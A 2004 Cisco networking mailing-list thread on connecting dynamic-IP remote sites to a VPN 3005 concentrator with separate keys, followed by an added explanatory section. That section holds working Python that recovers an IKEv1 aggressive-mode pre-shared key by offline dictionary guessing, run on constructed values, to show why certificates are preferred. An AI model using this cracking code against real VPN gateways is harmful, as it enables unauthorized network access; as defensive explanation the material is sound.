[c-nsp] Dynamic remotes connecting to VPN 3005. Is it possible?

Michael Markstaller mm at elabnet.de
Mon Sep 27 02:52:17 EDT 2004


In general it's easily possible, but it depends on what remotes you have
(VPN 3002, IOS, PIX, other?).

The first thing to consider is using certificates; otherwise, depending
on your devices, you run into the problems with PSK you mentioned.
Preshared keys are insecure and a bad idea in general, not only
regarding the "dynamic IP" issue.
There was an advisory not so long ago regarding the Groupname/Password
issue caused by the weakness of PSK. This only acknowledged what anybody
expected before: VPN 3000 stuff with PSK is as vulnerable as PSK is.
Cisco now introduced some Mutual-IKE stuff which is again only a
workaround - using certs is the solution.
But in general on the VPN 3000 it should be possible to separate peers
even with PSK (Groupname/Password), worst case creating 20 groups,
although I've never tried - but regarding security it leads to the same
problems.

Michael

> -----Original Message-----
> From: cisco-nsp-bounces at puck.nether.net 
> [mailto:cisco-nsp-bounces at puck.nether.net] On Behalf Of Brian Feeny
> Sent: Monday, September 27, 2004 2:31 AM
> To: cisco-nsp at puck.nether.net
> Subject: [c-nsp] Dynamic remotes connecting to VPN 3005. Is 
> it possible?
> 
> Does anyone know if it's possible to have remote sites, who are assigned
> dynamic IP addresses, connect to the VPN 3005 (the VPN 3005 would have a
> static IP address)? I know you can put all your remotes, in this case
> 20, into one Base Group and that would work, but then they share the
> same IKE password, and so this is not good, because if one site/client
> quits, you must change the password at 19 other sites. I want to be
> able to configure each client as its own group/profile with its own
> unique password/key. Lumping all remotes that use dynamic
> addressing/DHCP into one "Base Group" is not an option for me. Other
> vendors, like SonicWALL, can do this very easily, and so I am sure it's
> probably supported on the Cisco VPN concentrator, since many remote
> sites that need VPN are behind dynamic IP assignment.
> 
> Brian
> 
> ---------------------------------------------
> Brian Feeny, CCIE #8036, CISSP
> Network Engineer
> ShreveNet Inc.
> 
> 



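The PSK weakness Michael refers to, worked through as an added example that is not part of either post: in IKEv1 aggressive mode the responder's authenticator HASH_R is derived from the pre-shared key plus values that all travel in the clear (RFC 2409 sections 5 and 5.4), so whoever records one exchange, or simply initiates one with the group name, can test candidate group passwords offline without the concentrator ever seeing a failed login. The concentrator's real payloads are not reproduced: the cookies, nonces, DH values and SA body below are constructed filler, the prf is assumed to be HMAC-SHA1 (the negotiated hash being SHA-1), and the group name, password and wordlist are made up.

```python
import hashlib
import hmac
from dataclasses import dataclass, replace
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 section 3.2: with SHA-1 as the negotiated hash, prf is HMAC-SHA1."""
    return hmac.new(key, data, hashlib.sha1).digest()


@dataclass(frozen=True)
class AggressiveReply:
    """Fields a passive observer sees in the responder's aggressive-mode message.

    None of this is encrypted: aggressive mode sends identities and HASH_R in
    the clear, which is what makes the pre-shared key attackable offline.
    """
    cky_i: bytes    # initiator ISAKMP cookie
    cky_r: bytes    # responder ISAKMP cookie
    sai_b: bytes    # body of the initiator's SA payload (proposal/transforms)
    gxi: bytes      # initiator Diffie-Hellman public value
    gxr: bytes      # responder Diffie-Hellman public value
    ni_b: bytes     # initiator nonce body
    nr_b: bytes     # responder nonce body
    idir_b: bytes   # responder identity payload body (here: the group name)
    hash_r: bytes   # HASH_R as sent by the responder


def hash_r_for(psk: bytes, r: AggressiveReply) -> bytes:
    """RFC 2409, PSK authentication:
         SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Every input except the PSK is visible on the wire."""
    skeyid = prf(psk, r.ni_b + r.nr_b)
    return prf(skeyid, r.gxr + r.gxi + r.cky_r + r.cky_i + r.sai_b + r.idir_b)


def build_reply(psk: bytes, idir_b: bytes, seed: bytes = b"constructed") -> AggressiveReply:
    """Simulate the responder (the concentrator) emitting its aggressive-mode
    message. Cookies, nonces, DH values and the SA body are derived from a
    seed so the example is deterministic; they are constructed, not captured."""
    def blob(label: bytes, n: int) -> bytes:
        return hashlib.sha256(seed + label).digest()[:n]

    partial = AggressiveReply(
        cky_i=blob(b"cky_i", 8), cky_r=blob(b"cky_r", 8),
        sai_b=blob(b"sai", 40),
        gxi=blob(b"gxi", 128), gxr=blob(b"gxr", 128),
        ni_b=blob(b"ni", 20), nr_b=blob(b"nr", 20),
        idir_b=idir_b, hash_r=b"",
    )
    return replace(partial, hash_r=hash_r_for(psk, partial))


def crack_psk(reply: AggressiveReply, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R for each guess and compare it
    with the observed value. No further packets go to the gateway, so its
    lockouts and logs never see the attempts."""
    for guess in candidates:
        if hash_r_for(guess, reply) == reply.hash_r:
            return guess
    return None


# Constructed demo: one group password shared by all remotes in the group.
GROUP_NAME = b"branch-offices"
GROUP_PSK = b"cisco123"
WORDLIST = [b"password", b"letmein", b"cisco", b"cisco123", b"Summer2004"]

if __name__ == "__main__":
    observed = build_reply(GROUP_PSK, GROUP_NAME)
    print("recovered group password:", crack_psk(observed, WORDLIST))
```

Two consequences follow directly from the construction. Splitting the 20 remotes into 20 groups only changes which password each recorded exchange yields; every group password is still only as strong as its resistance to guessing, which is Michael's point that per-peer PSK "leads to the same problems". And because the responder must compute HASH_R before it can verify the initiator, an attacker does not even need to sniff a legitimate peer: knowing a group name is enough to elicit a HASH_R to crack. Main mode does not expose HASH_R in the clear to a passive observer, and certificate authentication removes the guessable secret altogether, which is why the thread lands on certificates.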